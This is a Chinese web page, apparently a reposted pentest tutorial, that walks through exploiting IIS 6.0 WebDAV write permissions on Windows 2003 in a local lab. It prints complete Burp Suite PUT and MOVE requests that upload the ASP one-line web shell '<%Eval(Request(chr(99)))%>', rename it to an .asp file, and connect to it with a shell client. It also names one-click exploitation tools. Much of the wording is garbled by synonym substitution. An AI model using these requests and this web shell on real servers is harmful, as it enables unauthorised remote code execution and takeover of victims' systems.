首页 » PHP教程 » phpincludeiis掉败技巧_轻松渗透Windows系列运用IIS写权限马脚

phpincludeiis掉败技巧_轻松渗透Windows系列运用IIS写权限马脚

访客 2024-12-08 0

扫一扫用手机浏览

文章目录 [+]

轻松渗透Windows系列-利用IIS写权限漏洞

周总理、钱壮飞和信息安全的故事

phpincludeiis掉败技巧_轻松渗透Windows系列运用IIS写权限马脚

视频加载中...

phpincludeiis掉败技巧_轻松渗透Windows系列运用IIS写权限马脚
(图片来自网络侵删)

目标

手工利用 IIS 写权限漏洞渗透 Windows 2003

先容

Windws 2003 下 IIS6.0 建立的网站目录,未做精确配置的话,会引入IIS写权限漏洞。
下面我们利用 Brup Suite 手工利用漏洞渗透 Windows 2003 并 getshell。

漏洞缘故原由

漏洞产生的缘故原由源于做事器配置不当造成,此漏洞紧张是由于做事器启用了 WebDav 的组件导致的。

环境

目标机: 系统:windows 2003 容器:iis6 IP: 192.168.153.135:8133攻击机: Burp Suite v2.1.07 (以上简称 Burp)

步骤

利用条件:

做事器上 IIS 6 配置启用了读取、写入权限,且启用了脚本资源访问权限;同时 WebDAV 做事有安装并启用

权限阐明:

脚本资源访问:用户可以对网站目录的脚本文件有操作的权限,条件是开启读取或者写入权限,开启读取权限就有读取脚本文件(源代码)的权限,开启写入权限就有写入脚本文件的权限。
读取:用户可以访问网站的文件,建立网站的时候默认开启读取权限。
写入:用户可以写入文件到网站目录,也便是我们所说的写权限漏洞。
(如果开启写入权限不开启脚本资源访问权限,则只有上传普通文件的权限,没有修正为脚本文件后缀的权限。
)目录浏览:用户可以查看网站目录的所有文件和目录。
条件是开启读取权限。

WebDAV 的开启是针对全体做事器设置,以是对付做事器管理员来说,须要考虑是否有须要启用此功能

目标网站预览(基于本地环境复现)

手工访问一个不存在的文件,并开启 Burp 抓包

先确认下目标做事器开启了哪些方法

发送数据包到 Repeater,并且修正 HTTP Method 为 OPTIONS

确认支持 PUT/MOVE

修正方法为 PUT,body 体里写一句话;发送后提示我们创建成功。
(把稳 body 体的一句话与 head 头空一行)

PUT /a.txt HTTP/1.1Host: 192.168.153.135:8133User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=4jmsaui1c4c0c1u2n1liump2e4; tq_current_visit_time=1605684590172; dmwh%5Fuser%5Fip=192%2E168%2E153%2E1; ASPSESSIONIDQAADAQAR=HOPHLGGCFPBGGDJMEHBNKJDA; tracqinfo={r$"792401704941603"#ct$1#tt$0#lv$"2020-11-18^2C15^3A29^3A55"#lt$""#pu$""#cn$""#ib$0#bt$0#lb$1605684595729#ci$""#cr$""#pt$""}Upgrade-Insecure-Requests: 1Content-Length: 26​<%Eval(Request(chr(99)))%>

利用 MOVE 方法,http head 部分添加属性值 Destination: http://192.168.153.135:8133/c.asp 修正创建的文件为脚本文件,如下

MOVE /a.txt HTTP/1.1Host: 192.168.153.135:8133User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeDestination: http://192.168.153.135:8133/a.aspCookie: PHPSESSID=4jmsaui1c4c0c1u2n1liump2e4; tq_current_visit_time=1605684590172; dmwh%5Fuser%5Fip=192%2E168%2E153%2E1; ASPSESSIONIDQAADAQAR=HOPHLGGCFPBGGDJMEHBNKJDA; tracqinfo={r$"792401704941603"#ct$1#tt$0#lv$"2020-11-18^2C15^3A29^3A55"#lt$""#pu$""#cn$""#ib$0#bt$0#lb$1605684595729#ci$""#cr$""#pt$""}Upgrade-Insecure-Requests: 1Content-Length: 26​<%Eval(Request(chr(99)))%>

访问天生的文件,确认文件存在

上菜刀

可以连续展开后续渗透了

有前辈已经开拓了利用工具,可以一键 getshell,有兴趣的小伙伴可以搜索下干系工具

软件名称:iiswrite/IISPutScanner

更加深入地学习与理解,请查看参考部分

参考

http://techgenix.com/webdav-iis/

http://www.rfcreader.com/#rfc3253

http://www.rfcreader.com/#rfc3253

https://zh.wikipedia.org/wiki/%E5%9F%BA%E4%BA%8EWeb%E7%9A%84%E5%88%86%E5%B8%83%E5%BC%8F%E7%BC%96%E5%86%99%E5%92%8C%E7%89%88%E6%9C%AC%E6%8E%A7%E5%88%B6

深圳德慎思信息安全专为金融、政府及企奇迹单位供应红队实战的安全测评做事,德慎思立足深圳放眼天下,紧抓中华民族复兴机遇,以科创为民的精神替中国在人类历史长河中的光辉一页贡献自身卓越技能。

公司专业供应网络信息安全、漏洞扫描、漏洞检测、系统漏洞检测、0day漏洞发掘、网络漏洞扫描等做事

标签:

相关文章

«    2025年3月    »
12
3456789
10111213141516
17181920212223
24252627282930
31